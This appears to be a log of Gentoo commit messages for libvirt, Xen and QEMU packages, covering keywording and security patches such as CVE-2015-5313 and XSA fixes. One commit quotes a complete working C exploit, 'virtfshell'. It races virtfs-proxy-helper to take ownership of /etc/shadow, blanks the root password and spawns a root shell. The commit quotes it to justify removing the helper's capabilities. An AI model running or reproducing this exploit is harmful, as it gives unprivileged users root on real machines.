| |
Gentoo-Bug: #568154
Package-Manager: portage-2.2.26
| |
Package-Manager: portage-2.2.26
| |
This is a cleanup for CVE-2015-5313 bug 568870.
Gentoo-Bugs: 568870
Package-Manager: portage-2.2.26
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
| |
This is a cleanup for CVE-2015-5313 bug 568870.
Gentoo-Bugs: 568870
Package-Manager: portage-2.2.26
| |
Apply fix for CVE-2015-5313 to 1.2.21:
A path-traversal flaw was found in the way the libvirt daemon handled
file-system names for storage volumes. A libvirt user with privileges to
create storage volumes and without privileges to create and modify
domains could possibly use this flaw to escalate their privileges.
Gentoo-Bug: 568870
Package-Manager: portage-2.2.26
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
| |
Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
| |
Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
| |
Package-Manager: portage-2.2.24
| |
Package-Manager: portage-2.2.24
| |
security patches added of xsa 164,165,166 re security Bug 567962
Gentoo bug: #567962
Package-Manager: portage-2.2.24
| |
security patches added of xsa 164,165,166, and those affecting qemu (4)
from xsa-155 re security Bug 567962
Gentoo bug: #567962
Package-Manager: portage-2.2.24
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
| |
Package-Manager: portage-2.2.20.1
Signed-off-by: Richard Yao <ryao@gentoo.org>
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
| |
The virtfs-proxy-helper program is not a safe binary to give caps.
The following exploit code demonstrates the vulnerability:
~=~=~=~= snip ~=~=~=~=
/* == virtfshell ==
*
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
* virtfs-proxy-helper makes some sort of flimsy check to make sure
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
*
* This should spawn a root shell eventually on vulnerable systems.
*
* - zx2c4
* 2015-12-12
*
*
* zx2c4@thinkpad ~ $ lsb_release -i
* Distributor ID: Gentoo
* zx2c4@thinkpad ~ $ ./virtfshell
* == Virtfshell - by zx2c4 ==
* [+] Beginning race loop
* [+] Chown'd /etc/shadow, elevating to root
* [+] Cleaning up
* [+] Spawning root shell
* thinkpad zx2c4 # whoami
* root
*
*/
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", &sbuf);
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];
sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());
printf("== Virtfshell - by zx2c4 ==\n");
printf("[+] Beginning race loop\n");
while (!it_worked()) {
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}
printf("[+] Chown'd /etc/shadow, elevating to root\n");
system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
" echo [+] Cleaning up;"
" cat /tmp/original_shadow > /etc/shadow;"
" chown root:root /etc/shadow;"
" rm /tmp/modified_shadow /tmp/original_shadow;"
" echo [+] Spawning root shell;"
" exec /bin/bash -i"
"'");
return 0;
}
| |
Package-Manager: portage-2.2.26
| |
Gentoo-Bug: 567654
Package-Manager: portage-2.2.26
| |
Package-Manager: portage-2.2.26
| |
Package-Manager: portage-2.2.26
| |
Package-Manager: portage-2.2.26
| |
Package-Manager: portage-2.2.26
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --force
| |
Package-Manager: portage-2.2.24
RepoMan-Options: --force
| |
Note: line 3 in previous commit re adding sec patches should read;
Addition of patches XSA-158 (#566844), XSA-{159,160} (#566842)
Package-Manager: portage-2.2.24
| |
Package-Manager: portage-2.2.24
| |
Addition of patches XSA-158 (#566844), XSA-{159,160} (#566842), fixing all
corresponding security issues, patches made available for public release
as of yesterday (08/12). Patches compressed into my devspace then combined
with those of dlan insource. This format will do for now. Not to be
adjusted without prior discussion. All patches pass runtests
Gentoo bugs: #566842 #566844
Package-Manager: portage-2.2.24
| |
Package-Manager: portage-2.2.24
| |
Addition of patches XSA-158 (#566842), XSA-158 (#566844), fixing all
corresponding security issues, patches made available for public release
as of yesterday (08/12). Patches compressed into my devspace then combined
with those of dlan insource. This format will do for now. Not to be
adjusted without prior discussion. All patches pass runtests.
Gentoo bugs: #566842 #566844
Package-Manager: portage-2.2.24
| |
Package-Manager: portage-2.2.24
| |
bump to latest upstream release.
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
| |
app-emulation/xen-tools now exposes a sub-slot to help dependencies
rebuild when necessary.
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
| |
app-emulation/xen-tools now exposes a sub-slot to help dependencies
rebuild when necessary.
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
| |
This reverts commit 8a11081f495114c5ddfb54a8cef9285d6d7aa878. The
sub-slot needs to only be on app-emulation/xen-tools.
| |
Package-Manager: portage-2.2.26